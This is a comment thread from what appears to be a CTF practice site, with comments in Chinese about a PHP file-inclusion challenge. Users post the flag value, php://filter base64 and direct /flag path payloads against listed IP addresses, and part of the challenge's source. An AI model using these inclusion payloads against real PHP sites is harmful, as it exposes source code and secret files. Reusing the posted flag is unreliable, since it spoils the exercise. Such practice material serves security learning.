跟南邮ctf一摸一样
flag{b8aba5bfc55997b3368ac7b88fe3854f}
http://xxxxxxxxxxxxx/index.php?file=///flag
php伪协议的简单利用
石
过分了,谁都知道是伪协议
?file=php://filter/read=convert.base64-encode/resource=index.php
<?php error_reporting(0); if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';} $file=$_GET['file']; if(strstr($file,"../")||stristr
http://114.67.175.224:18948/index.php?file=php://filter/convert.base64-encode/resource=index.php 得到一串base64编码,解码之后发现是源码,直接有falg
http://114.67.175.224:11806/index.php?file=/flag Copy this url then you can get the flag.
...
评论
Tolayxu 3天前
举报
跟南邮ctf一摸一样
17344057285 29天前
举报
flag{b8aba5bfc55997b3368ac7b88fe3854f}
YUMEKO 2月前
举报
http://xxxxxxxxxxxxx/index.php?file=///flag
15614005380 2月前
举报
php伪协议的简单利用
zh2i 5月前
举报
石
YUMEKO 2月前
举报
过分了,谁都知道是伪协议
EtHat 5月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php
bkyhack123 6月前
举报
<?php error_reporting(0); if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';} $file=$_GET['file']; if(strstr($file,"../")||stristr
bkyhack123 6月前
举报
<?php error_reporting(0); if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';} $file=$_GET['file']; if(strstr($file,"../")||stristr
fonddream 7月前
举报
http://114.67.175.224:18948/index.php?file=php://filter/convert.base64-encode/resource=index.php 得到一串base64编码,解码之后发现是源码,直接有falg
大哥大 7月前
举报
http://114.67.175.224:11806/index.php?file=/flag Copy this url then you can get the flag.